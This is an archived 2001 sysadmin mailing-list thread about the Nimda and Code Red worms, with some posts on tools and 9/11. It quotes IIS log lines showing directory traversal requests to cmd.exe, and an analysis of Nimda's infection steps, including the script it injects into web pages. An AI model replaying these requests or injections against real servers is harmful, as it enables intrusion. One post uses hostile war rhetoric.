-Original Message- From: Don Collier (Intermap Denver) [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 6:03 PM To: NT System Admin Issues Subject: How do you all do it? I just joined this list today and am overwhelmed with email. Almost 200 messages today. How do you all keep up with this list and get any work done? (Not meant to imply anything) We don't...maybe you are on the wrong list...we are all independently wealthy and just like to keep hacking. ...you work? John _ Don Collier Network Administrator Intermap Technologies Inc. Voice: 303-708-0955 x-207 Fax:303-708-0952 [EMAIL PROTECTED] www.intermaptechnologies.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Help for the Nimda virus
If any one is interested: We are giving away FREE our SearchIt program. SearchIt can search your logfiles, or any files, for text strings you define. You can search for cmd.exe or tftp or any other piece of a virus or IIS exploit. SearchIt may be run via a scheduler and a report of the found files is emailed to you. The FREE Download is at: http://www.cserverautomationtools.com John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Help for the Nimda virus
-Original Message- From: Givens, Mike [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:51 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus define free the link provided only goes to a trail version located in the downloads area ? There is a link right on the opening page right next to the dancing tools. John -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:50 AM To: NT System Admin Issues Subject: Help for the Nimda virus Previous email contained an incorrectly formatted URL. Try this one. If any one is interested: We are giving away FREE our SearchIt program. SearchIt can search your logfiles, or any files, for text strings you define. You can search for cmd.exe or tftp or any other piece of a virus or IIS exploit. SearchIt may be run via a scheduler and a report of the found files is emailed to you. The FREE Download is at: http://www.serverautomationtools.com John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Help for the Nimda virus
-Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:54 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus It also doesn't work. I downloaded and installed it, and it didn't even create an executable. That's not true actually. 1. It is FREE a production copy. The link is right on the home page to the right of the dancing tools. 2. The search.exe file is in the c:\winnt\system32 directory. I didn't think it would be difficult to give something away. :0 John -Original Message- From: Givens, Mike [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:51 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus define free the link provided only goes to a trail version located in the downloads area ? -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:50 AM To: NT System Admin Issues Subject: Help for the Nimda virus Previous email contained an incorrectly formatted URL. Try this one. If any one is interested: We are giving away FREE our SearchIt program. SearchIt can search your logfiles, or any files, for text strings you define. You can search for cmd.exe or tftp or any other piece of a virus or IIS exploit. SearchIt may be run via a scheduler and a report of the found files is emailed to you. The FREE Download is at: http://www.serverautomationtools.com John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Help for the Nimda virus
-Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:36 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus I find it ironic that I had to use Explorer Search to find Searchit. Yes, there is a glitch in the installer program we used. It works fine on NT4.0 but on Win2k it appends the setup path to the exe's install path. It's fairly easy to set the searchit.exe path to c:\winnt\system32\searchit.exe and it will be fine. We'll get that fixed as soon as we get the fix for the installer. John Cesta -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:29 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus Mod the shortcut to point to the windows dir and it works fine. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:26 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus We appreciate the thought, but the tool does not install properly. -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 8:14 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:54 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus It also doesn't work. I downloaded and installed it, and it didn't even create an executable. That's not true actually. 1. It is FREE a production copy. The link is right on the home page to the right of the dancing tools. 2. The search.exe file is in the c:\winnt\system32 directory. I didn't think it would be difficult to give something away. :0 John -Original Message- From: Givens, Mike [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:51 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus define free the link provided only goes to a trail version located in the downloads area ? -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:50 AM To: NT System Admin Issues Subject: Help for the Nimda virus Previous email contained an incorrectly formatted URL. Try this one. If any one is interested: We are giving away FREE our SearchIt program. SearchIt can search your logfiles, or any files, for text strings you define. You can search for cmd.exe or tftp or any other piece of a virus or IIS exploit. SearchIt may be run via a scheduler and a report of the found files is emailed to you. The FREE Download is at: http://www.serverautomationtools.com John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Help for the Nimda virus
-Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 1:03 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus Very usefull tool. Thanks John. You're welcome! John -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:02 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:36 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus I find it ironic that I had to use Explorer Search to find Searchit. Yes, there is a glitch in the installer program we used. It works fine on NT4.0 but on Win2k it appends the setup path to the exe's install path. It's fairly easy to set the searchit.exe path to c:\winnt\system32\searchit.exe and it will be fine. We'll get that fixed as soon as we get the fix for the installer. John Cesta -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:29 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus Mod the shortcut to point to the windows dir and it works fine. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:26 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus We appreciate the thought, but the tool does not install properly. -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 8:14 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:54 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus It also doesn't work. I downloaded and installed it, and it didn't even create an executable. That's not true actually. 1. It is FREE a production copy. The link is right on the home page to the right of the dancing tools. 2. The search.exe file is in the c:\winnt\system32 directory. I didn't think it would be difficult to give something away. :0 John -Original Message- From: Givens, Mike [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:51 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus define free the link provided only goes to a trail version located in the downloads area ? -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:50 AM To: NT System Admin Issues Subject: Help for the Nimda virus Previous email contained an incorrectly formatted URL. Try this one. If any one is interested: We are giving away FREE our SearchIt program. SearchIt can search your logfiles, or any files, for text strings you define. You can search for cmd.exe or tftp or any other piece of a virus or IIS exploit. SearchIt may be run via a scheduler and a report of the found files is emailed to you. The FREE Download is at: http://www.serverautomationtools.com John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Help for the Nimda virus
Title: RE: Help for the Nimda virus Yo John - how come all your responses are blank. Or is just me. Maybe because I am entering them under the question inline. John -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 19, 2001 1:57 PMTo: NT System Admin IssuesSubject: RE: Help for the Nimda virus Yo John - how come all your responses are blank. Or is just me. -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:18 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 1:03 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus Very usefull tool. Thanks John. You're welcome! John -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:02 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message-From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:36 PMTo: NT System Admin Issues Subject: RE: Help for the Nimda virus I find it ironic that I had to use Explorer Search to find Searchit. Yes, there is a glitch in the installer program we used. It works fine on NT4.0 but on Win2k it appends the setup path to the exe's install path. It's fairly easy to set the searchit.exe path to c:\winnt\system32\searchit.exe and it will be fine. We'll get that fixed as soon as we get the fix for the installer. John Cesta -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:29 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus Mod the shortcut to point to the windows dir and it works fine. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:26 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus We appreciate the thought, but the tool does not install properly. -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 8:14 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:54 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus It also doesn't work. I downloaded and installed it, and it didn't even create an executable. That's not true actually. 1. It is FREE a production copy. The link is right on the home page to the right of the dancing tools. 2. The search.exe file is in the c:\winnt\system32 directory. I didn't think it would be difficult to give something away. :0 John -Original Message- From: Givens, Mike [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:51 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus define "free" the link provided only goes to a "trail" version located in the downloads area ? -Original Message----- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:50 AM To: NT System Admin Issues Subject: Help for the Nimda virus Previous email contained an incorrectly formatted URL. Try this one. If any one is interested: We are giving away FREE our SearchIt program. SearchIt can search your logfiles, or any files, for text strings you define. You can search for cmd.exe or tftp or any other piece of a virus or IIS exploit. SearchIt may be run via a scheduler and a report of the found files is emailed to you. The FREE Download is at: http://www.serverautomationtools.com John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.
RE: WARNING: Hacker Alert
looks like the same old code red to me. -Original Message- From: Randal, Phil [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 11:23 AM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert Looks like a new worm to me. Probably planted on all those Code Red compromised servers :-( Phil - Phil Randal Network Engineer Herefordshire Council Hereford, UK -Original Message- From: Jason Morris [mailto:[EMAIL PROTECTED]] Sent: 18 September 2001 15:59 To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert CodeRed seems to have dwindled to nothing on my logs. But it's being replaced with the EXACT same lines you have below, and they stay consistent with the code red 2 methods of attacking the more local subnets. Jason Morris CCDA CCNP Network Administrator MJMC, Inc. 708-225-2350 [EMAIL PROTECTED] -Original Message- From: Jason Morris [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:50 AM To: NT System Admin Issues Cc: '[EMAIL PROTECTED]' Subject: RE: WARNING: Hacker Alert Yes. It seems to be systems I have previously monitored hitting me with codered attacks. I bet someone is activating all of their children. Jason Morris CCDA CCNP Network Administrator MJMC, Inc. 708-225-2350 [EMAIL PROTECTED] -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:45 AM To: NT System Admin Issues Subject: WARNING: Hacker Alert All my public facing web servers at home and at my office have shown a huge continuous hacking activity. Has anyone seen similar? I fear this may be code red related or automated. Please comment if you have seen similar. Here is an excerpt from one logfile: 63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system 32/cmd.exe , /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system 32/cmd.exe , /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01,
RE: Auto Reboot W2K Servers
-Original Message- From: Ian Kelly [mailto:[EMAIL PROTECTED]] Sent: Monday, September 17, 2001 5:33 PM To: NT System Admin Issues Subject: RE: Auto Reboot W2K Servers Andrew, You wouldn't believe the number of people that have told me NT servers should be rebooted regularly! It is a good idea to reboot ANY Windows machine regularly. John Cesta ColdFusion ASP ActiveState PERL Hosting Includes 10 Domains - 100% Browser Based Administration http://www.cybersmarts.net LogFileManager - IIS LogFile Management Tool WebPageChecker - Helps Maintain Server UpTime http://www.serverautomationtools.com You definitely wouldn't believe how much of my day I've spent trying to persuade them otherwise... Ian --- mailto:[EMAIL PROTECTED] --- -Original Message- From: Andrew S. Baker [mailto:[EMAIL PROTECTED]] Sent: September 17, 2001 17:08 PM To: NT System Admin Issues Subject: RE: Auto Reboot W2K Servers A - http://www.ultratech-llc.com/KB/?File=Shutdown.TXT B - Why ever would you want to reboot your servers on a scheduled basis? == ASB - http://www.ultratech-llc.com/KB/?File=~MoreInfo.TXT == Illiterate?... Write for free help. -Original Message- From: Guerra, Ralph [mailto:[EMAIL PROTECTED]] Sent: Monday, September 17, 2001 5:33 PM To: NT System Admin Issues Subject: Auto Reboot W2K Servers I am looking for a utility that auto reboots Windows 2000 servers. I know with NT 4.0 and Terminal servers you would use the shutdown.exe from NT Resource Kit. I have not been able to find this utility on the Windows 2000 Resource Kit. Doe anybody know what I can use for scheduled reboots of Windows 2000 Servers? TIA RG http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Virus Update
I am getting this thing on my PC. When I click on the email a dialog appears asking me if I wish to save this to disk or open it. It's a readme.exe file. John Cesta -Original Message-From: Clark, Steve [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 2:16 PMTo: NT System Admin IssuesSubject: Virus Update Got this from Peter Kruse who pointed me to http://www.norman.no/ - thanks! The worm W32/Nimda.A@mm is spreading very fast. It may arrive as an email with the following charteristics:Subject: NoneBody: NoneAttachment name: README.EXEThis worm may enter a computer in several ways - it will either be received as an email with an attachment, over open shared drives in networks, and it seems that it will also attempt to break into machines running the web server software IIS (Internet Information Server), utilizing various security holes well known . All IIS web server admins are encouraged to patch up their web server to protect themselves. An accumulative patch for IIS servers is available from: http://www.microsoft.com/technet/security/bulletin/MS01-044.aspWhen the infected file is run, it will copy itself to the system directory as a hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so that it is run from startup. It may not remove everything but it may stop it long enough to see what damage was done. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: FW: Worm probes
Title: RE: FW: Worm probes -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 3:26 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes From Panda (note they won't have a sig file for a few hours yet): Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed. I am not so sure thatthis assessment is entirely correct. For example, in my situation, I have a PC with Outlook2000 and preview mode enabled. What I get is that when I click on the email a dialog box opens and prompts whether or not Iwish to save the file to disk - the README.EXE file that is.I just click cancel and then delete the email. I do not contract the virus. John Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: Worm probes Here's one from a thread on nanog HTH, Geoff - Original Message - From: "Jim Olsen" [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, September 18, 2001 11:03 AM Subject: Re: FW: Worm probes This is the information i've collected thus far on W32.nimda: W32.nimda is NOT a code red variant, and the people who referring to it as "Code Blue" were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 server's to infect a server, and also employ's email and web site mobile code to infect Windows 9x/ME/NT/2k boxes. During the initial infection of a server, the worm does the following: - download a file named "admin.dll" via tftp from the system that is trying to infect the target - add the guest account to the local administrators group and activates the account - makes sure c$ is shared out - copies itself to c, d, and e drives - tries to mail itself to email addresses that it discovers on the server - creates a file named readme.exe, which is used in the mobile code inserted on the web sites below - add this string to the web pages found on the server: htmlscript language="JavaScript"window.open("readme.eml", null, "resizable=no,top=6000,left=6000")/script/html - scans for and infects other vulnerable IIS servers - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory. - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above "readme.exe" format (win2000 only) If a user views a web site that is hosted on an infected server, the following happens: - upon viewing an infected page, the mobile code extracts to readme.exe and starts in windows media player (without user intervention) - the user's machine becomes infected with W32.nimda at this point and time - the worm starts scanning for other vulnerable IIS servers - the worm emails itself to everyone on the user's address book - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogjan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory. - puts a
RE: has anyone used doubletake successfully?
A great product, been using it for 4 years syncing two web servers, Web data, ftp data mail data etc. Never had a problem. BTW, it's overkill for us and we are switching to Peersync to do this task. In no way does this reflect badly on DT. It is just more that we need to replicate web data. John Cesta ColdFusion ASP ActiveState PERL Hosting Includes 10 Domains - 100% Browser Based Administration http://www.cybersmarts.net LogFileManager - IIS LogFile Management Tool WebPageChecker - Helps Maintain Server UpTime http://www.serverautomationtools.com -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 13, 2001 4:31 PM To: NT System Admin Issues Subject: RE: has anyone used doubletake successfully? Works like a champ. Keep in mind, DATA only - not the configuration of IIS. I think our esteemed list sponsor also uses it for their web sites. -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 13, 2001 4:26 PM To: NT System Admin Issues Subject: RE: has anyone used doubletake successfully? For replication of web data? Does it do a good job? -Original Message- From: Gordon Olson [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 13, 2001 12:48 PM To: NT System Admin Issues Subject: RE: has anyone used doubletake successfully? Yes - using it right now, web servers -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 13, 2001 12:19 PM To: NT System Admin Issues Subject: RE: has anyone used doubletake successfully? yes -Original Message- From: Mikelist (E-mail) [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 13, 2001 3:17 PM To: NT System Admin Issues Subject: has anyone used doubletake successfully? to replicate data and services on nt4 server and/or win2k server? -- Michael D. Plotsker Technology Consultant KJ Technology Consulting, Inc. T. 718-575-1595 C. 917-406-4215 F. 212-202-5013 [EMAIL PROTECTED] http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NewYork Terrorist Attack
Title: RE: NewYork Terrorist Attack -Original Message-From: David James [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:45 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack I don't mean to promote war, but we as a country HAVE to retaliate to this... F00k the 3rd world countries that harbor terrorists... Why not call it WAR, that's what it is21 Century WAR!!We MUST retaliate and immediatley upon locating who is responsible! -Original Message-From: Mal Sasalu [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:33 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack I watched over the television. The structures of both north and south towers of WTO came down with a huge blast and now they are basically a heap of rubble. -Original Message-From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 9:30 AMTo: NT System Admin IssuesSubject: RE: NewYork Terrorist Attack Could you confirm either more or less whether the structures are basically now grade level? -Original Message- From: Roman Bogdanov [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 10:24 To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Im about 40 blocks from the towers and we were all told we can go home but all the bridges and subways are closed so here i am trying to figure out a way to get to brooklyn. Roman Bogdanov Head of IT Support Jnana Technologies Corp. www.jnana.com 212-560-9151 ext. 202 212-560-9066 fax -Original Message- From: Richard Newton Jr. [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:24 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack Us in Jersey City, NJ (just across the water) were evacuated and sent home. Its going to be a long day for all. -Original Message- From: Jeff Pace [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:26 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack and it doesn't seem to be over yet. Jeff -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 8:19 AM To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack This is an incredibly tragic day. Probably the most tragic for the US since the assassination of JFK - ASB -Original Message- From: Richard McMahon [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:07 AM To: NT System Admin Issues Subject: NewYork Terrorist Attack Check out this link. http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 102, 00.html Hope out all you guys in the New York area are still with us.. Good luck, Richard http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Another Building Fell
-Original Message- From: Michael Brubaker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 5:34 PM To: NT System Admin Issues Subject: Another Building Fell A 47 story building next the WTC just fell! Yea, we watch the news too. :) Michael Brubaker Vice President Tel: (321) 631-8073 Fax: (321) 632-8769 [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] IICwww.iictel.com http://www.iictel.com/ International InterConnect 297 Barnes Blvd. Rockledge, FL 32955 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Server Backups
